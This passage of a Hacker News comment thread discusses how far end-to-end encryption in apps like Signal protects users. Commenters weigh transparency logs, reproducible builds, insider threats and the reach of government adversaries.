         | "big guy", what remains is to give all the "little guys" a good
         | enough loudspeaker to point distrust.
         | 
         | A few examples: - certificate transparency logs so your traffic
         | is not MitM'ed - reproducible builds so the binary you get
         | matches the public open source code you expect it does
         | (regardless of its quality) - key transparency, so when you
         | chat with someone on WhatsApp/Signal/iMessage you actually get
         | the public keys you expect and not the NSA's
        
           | parhamn wrote:
           | > This makes that entire goal moot
           | 
           | I agree. Perhaps it's why I find the discussions like nonce-
           | lengths and randomness sources almost insane (in the sense of
           | willfully missing the forrest from the trees). Intelligence
           | agencies have managed to penetrate the most secretive and
           | powerful organizations known to man. Why would one think
           | Signal's supply chain is impervious? I'd assume the opposite.
        
             | inor0gu wrote:
             | I don't think they are insane, they are quite useful when
             | designing security mechanisms, while at the same time being
             | utter noise for the end-user benefiting from that system.
             | 
             | > If you're building a chip to generate prime numbers I do
             | surely hope you know how to select randomness or make
             | constant time & branch free algorithms, just like an
             | engineer designing elevators better know what should be the
             | tensile strength of the cable it'll use. In either cases,
             | it's mumbo jumbo for me, and I just need to get on with my
             | day.
             | 
             | Part of what muddies the water is our collective inability
             | to separate the two contexts, or empower tech communicators
             | to do it. If we keep making new tech akin to esoteric
             | magic, no one will board the elevator.
        
         | SheinhardtWigCo wrote:
         | It's primarily to guard against insider threats - E2E makes it
         | very hard for one Signal employee to obtain everyone's chat
         | transcripts.
         | 
         | Anyone whose threat model includes well-resourced actors (like
         | governments) should indeed be building their communications
         | software from source in a trustworthy build environment. But
         | then of course you still have to trust the hardware.
         | 
         | tl;dr: E2E prevents some types of attacks, and makes some
         | others more expensive; but if a government is after you, you're
         | still toast.
        
           | parhamn wrote:
           | > tl;dr: E2E prevents some types of attacks, and makes some
           | others more expensive; but if a government is after you,
           | you're still toast.
           | 
           | This is sorta my point, lots of DC folks use Signal under the
           | assumption they're protected from government snooping.
           | Sometimes I feel like it could well have the opposite effect
           | (via the selection bias of Signal users).
        
       ___________________________________________________________________
       (page generated 2025-02-19 23:00 UTC)